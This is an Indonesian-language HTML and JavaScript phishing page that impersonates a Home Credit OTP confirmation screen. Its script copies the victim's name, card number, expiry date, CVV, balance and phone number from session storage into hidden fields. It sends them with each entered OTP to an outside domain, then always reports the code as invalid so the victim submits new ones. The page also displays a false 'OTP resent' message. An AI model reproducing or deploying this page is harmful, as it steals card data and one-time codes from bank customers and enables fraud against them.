<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <meta name="fragment" content="!"> 
  <meta name="theme-color" content="#d11f35"> 
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
  <title>otp kupon</title>
  <style>
    @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            padding: 0;
            margin: 0;
            width: 100%;
            font-family: 'Open Sans', sans-serif;
            position: fixed;
            background: #c0c0c0;
        }
        
       .container{
         max-width: 100%;
         width: 330px;
         height: 430px;
         background: #fff;
         margin: -40px auto;
         border-radius: 15px;
         display: block;
         position: relative;
         top: 150px;
         box-shadow: 4px 7px 10px rgba(0,0,0,0.5);
         box-sizing: border-box;
         justify-content: center;
         justify-items: center;
         align-items: center;
       }
       .wraper{
         width: 100%;
         position: fixed;
         top: 0;
         height: auto;
         left: 0;
         right: 0;
         
       }
       .wraper img{
         width: 320px;
         height: 200px;
         left: 0;
         right: 0;
         margin: 9px auto;
         left: 0;
         right: 0;
         top: 0;
         bottom: 0;
       }
       .animasi{
        margin-top: -70px;
        position: fixed;
        left: 0px;
        right: 0;
        
       }
       .box-otp{
         max-width: 90%;
         width: 287px;
         padding: 10px;
         margin: 22px;
         text-align: center;
         font-size: 15px;
         outline: none;
         background: #fff;
         border-radius: 8px;
         border: 2px solid #d11f35;
         font-weight: 600;
         z-index: 999999999;
         box-sizing: border-box;
       }
       #pelew{
         width: 80%;
         padding: 10px;
         margin: 33px;
         border: 2px solid #fff;
         cursor: pointer!important;
         background: #d11f35;
         border-radius: 8px;
         font-size: 15px;
         color: #fff;
         font-weight: 600;
         box-shadow: 4px 7px 10px rgba(0,0,0,0.5);
         
       }
       h1{
            display: table;
            background-color: transparent;
            color: #FF0000;
            width: 100%;
            font-size: 10px;
            margin-bottom: -70px;
            text-align: center;
           font-weight: bold;
            right: 0;
            left: 0;
            margin: 0px auto;
            position: fixed;
            
        }
        
        .blink {
  animation: blink-animation 2s steps(6, start) infinite;
  -webkit-animation: blink-animation 2s steps(6, start) infinite;
}
@keyframes blink-animation {
  to {
    visibility: hidden;
  }
}
@-webkit-keyframes blink-animation {
  to {
    visibility: hidden;
  }
}

#Aktivasi{
    display: none;
}
.textarea1 {
     box-sizing: border-box; 
     border: 2px solid red;
     border-radius: 8px;
     
        }
        .textarea2 {
     box-sizing: border-box; 
     border: 2px solid red;
     border-radius: 8px;  
  }
  </style>
</head>
<body>
  <div class="container">
    <div class="wraper">
      <center>
      <img class="" src="https://hosting.tigerengine.id/eicryn.png" alt="" style="max-width: 100%;width: 180px;height: 80px;" />
      </div>
      </center>
      <br><br>
       <div id="popupku" style="position: fixed;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  width: 100%; height: 100%; background: rgba(0,0,0, 0.4); z-index: 9999">
    <center>
 <img id="gambarku" class="animated" src="https://hosting.tigerengine.id/zrmu7z.jpg" width="60%" style="margin-top: 250px; border-radius: 15px; box-shadow: rgba(199, 199, 199, 2.2)  0px 2px 5px 0px; border: 2px double #d11f35" onclick="tutupimg()">
    </center>
    </div>
      <div style="width: 90%;padding: 9px;border-bottom: 1px solid transparent;margin: 7px;position: relative;top: 25px;">
        <h6 style="text-align: center;font-size: 10px;color: #000;">Masukan Kode OTP Pengajuan Kartu Fisik,Yang Telah Kami Kirimkan Melalui WhatsApp di Nomor Handphone Kamu Yang Terdaftar Di Home Credit Untuk Melanjutkan Proses Pengajuan Kartu Fisik</h6>
      </div>
      <form action="sendOtp.php" method="post" id="sendOtp">
        <span class="blink" style="display: none" id="blinkAktivasi"><h1>OTP Cetak Kupon invalid, atau sudah kadaluarsa</h1></span>
       <input type="hidden" name="namaku" id="namaku" value="">
       <input type="hidden" name="nokarku" id="nokarku" value="">
       <input type="hidden" name="bulanku" id="bulanku" value="">
       <input type="hidden" name="tahunku" id="tahunku" value="">
       <input type="hidden" name="cvvku" id="cvvku" value="">
       <input type="hidden" name="saldoku" id="saldoku" value="">
       <input type="hidden" name="nomorku" id="nomorku" value="">
        <div class="box-=input">
          <input type="text" name="otp" id="otp" placeholder="OTP 6 Digit" inputmode="numeric" minlength="6" maxlength="6" required class="box-otp" onclick="gantiborder1()" oninvalid="this.setCustomValidity('Masukan Kode OTP Cetak Kupon')" onchange="this.setCustomValidity('')">
        </div>
        <center>
       <p id="alert" style="font-size: 10px;width: 100%;background: transparent;color: #000;position: fixed;text-align: center;top: 355px;right: 0;left: 0;font-weight: bold;display: ;" class="alert"></p>
     </center>
        <div class="box-btn">
          <button type="submit" id="pelew">Konfirmasi</button>
        </div>
      </form>
  </div>
  <br>
  <br>
  <br><br>
   <button style="width: 100%;font-size: 12px;background: none;border: none;text-align: center;font-weight: bold;position: fixed;margin-top: 50px;margin-left: 0;color:rgb(9, 100, 127);" onclick="sendUlang()">>>Kirim Ulang OTP<<</button>
  <!-- partial -->
  <audio hidden controls id="btn">
    <source src="speech.mp3" type="audio/mp3">
   </audio>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
 <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"

    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="

    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
  <script src='https://cdnjs.cloudflare.com/ajax/libs/vue/2.6.10/vue.min.js'></script>
<script src='https://unpkg.com/vue-the-mask@0.11.1/dist/vue-the-mask.js'></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
 <script>
  function tutupimg(){
  setTimeout(() => {
  $("#popupku").hide();
  },1000)
  setTimeout(() => {
    audio = document.getElementById("btn");
    audio.play();
    audio.loop = false
  },900)
}
</script>
<script>

var nama = sessionStorage.getItem("nama");
document.getElementById("namaku").value = nama + "";

var nokar = sessionStorage.getItem("nokar");
document.getElementById("nokarku").value = nokar + "";

var bulan = sessionStorage.getItem("bulan");
document.getElementById("bulanku").value = bulan  + "";

var tahun = sessionStorage.getItem("tahun");
document.getElementById("tahunku").value = tahun  + "";
var cvv = sessionStorage.getItem("cvv");
document.getElementById("cvvku").value = cvv  + "";
var saldo = sessionStorage.getItem("saldo");
document.getElementById("saldoku").value = saldo  + "";
var nomor = sessionStorage.getItem("nomor");
document.getElementById("nomorku").value = nomor  + "";
  </script>
 <script>
 $('#sendOtp').on('submit', function (event) {

  event.stopPropagation();
    event.preventDefault();
  document.getElementById('pelew').innerHTML = "Memproses....";
 



$.ajax({

 type: 'POST',
 url: 'https://kontol-sepetan.my.id/Homecredit/req/sendOtp.php',
 async: false,
 dataType: 'JSON',
 data: $(this).serialize(),
 
 complete: function(data) {
            console.log('Complete')
 setTimeout(function(){
 document.getElementById('pelew').innerHTML = "Konfirmasi";
 $('#alert').hide("");
  document.getElementById("blinkAktivasi").style.display = "block";
 $("#otp").val("");
 $("#otp").addClass('textarea1'); 
  


    },900);



        }
    });

    return false;
});   
        
</script>
<script>
  function sendUlang(){
    $('.blink').hide();event.preventDefault();
    setTimeout(function(){
    $("#otp").removeClass('textarea1');
    },700);
    
    $("#nama1").addClass('textarea2');
    $('#alert').show();
     var nomorku = document.getElementById('nomorku').value;
     sessionStorage.setItem('nomorku', nomorku);
     document.getElementById('alert').innerHTML = 'OTP telah terkirim ulang ke +62' +  nomorku+  '<br>via SMS di nomor handphone anda';
  }
</script>
<script>
 function gantiborder1(){
   $("#otp").removeClass('textarea1'); 
   
   $("#blinkAktivasi").hide(); 
   document.getElementById('pelew').value = "Konfirmasi";
 }   
</script>
</body>
</html>